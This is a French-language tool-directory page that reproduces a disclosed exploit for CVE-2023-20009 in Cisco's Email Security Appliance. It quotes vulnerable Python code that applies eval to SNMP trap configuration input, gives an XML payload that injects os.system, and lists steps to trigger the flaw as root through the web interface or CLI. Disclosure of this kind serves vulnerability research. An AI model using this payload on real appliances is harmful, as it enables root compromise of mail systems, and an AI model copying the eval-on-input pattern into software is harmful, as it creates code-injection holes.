Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cisco-CVE-2023-20009 — Cisco Email Security Appliance: Exécution de code à distance - RCE à partir du fichier de configuration | Kitploit
Outils/GitHubGitHub/ly1g3/cisco-cve-2023-20009
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHubly1g3/cisco-cve-2023-20009

cisco-CVE-2023-20009

Cisco Email Security Appliance: Exécution de code à distance - RCE à partir du fichier de configuration

Voir le dépôt
12il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

À propos

Chercheur en sécurité : ly1g3, ly1g3[at]tuta.io

Empreinte GPG : https://keys.openpgp.org/vks/v1/by-fingerprint/5FE85CE4E8F675F5ABD2C0A33CE8BE447ED6D586

Aperçu : Exécution de code à distance - RCE à partir d'un fichier de configuration

CVE : CVE-2023-20009

Chronologie :

  • Découverte - ly1g3
  • Signalée - ly1g3
  • Corrigée - Cisco

Cisco AsyncOS 14.2.0

ESA (Cisco Secure Email) et Cisco Secure Email and Web Manager

Élévation de privilèges - shell root

Un utilisateur authentifié disposant des permissions pour SNMP-config peut exécuter du code arbitraire en tant que root en utilisant une configuration de trap SNMP spécialement conçue.

Technique

Code exploité ui_checker.py:

root@kitploit:~
def validate_trap_configuration(base, value_dict):
    validators = eval('read_var_auto_level_wrapper("snmp.%s_traps.configuration_class", non_editable_var=True)' % (base,))
    for k, v in value_dict.iteritems():
        if validators.has_key(k):
            base, conf_class_str = validators[k].rsplit('.', 1)
            module = __import__(base, fromlist=[conf_class_str])
            conf_class = eval('module.%s("%s")' % (conf_class_str, v))
        else:
            raise FilterError('validate_%s_trap_configuration_value' % (base,),
                              _("Trap does not allow configuration"), k)
    return value_dict

v contiendra la valeur de common_trap.common_configuration

root@kitploit:~
<common_trap>
    <common_name>connectivityFailure</common_name>
    <common_enabled>0</common_enabled>
    <common_configuration>http://asd.asd.&quot;+os.system(&quot;touch test.txt&quot;))#,5</common_configuration>
    </common_trap>
<common_trap>

Étapes pour déclencher via l'interface WEB-GUI :

  1. https://192.168.1.10/system_administration/configuration_file
  2. "Charger un fichier de configuration depuis l'ordinateur local"
  3. Remplacer le champ actuel connectivityFailure par la charge utile ci-dessus

Étapes pour déclencher via CLI

  1. loadconfig
  2. Coller la charge utile
Télécharger l’outil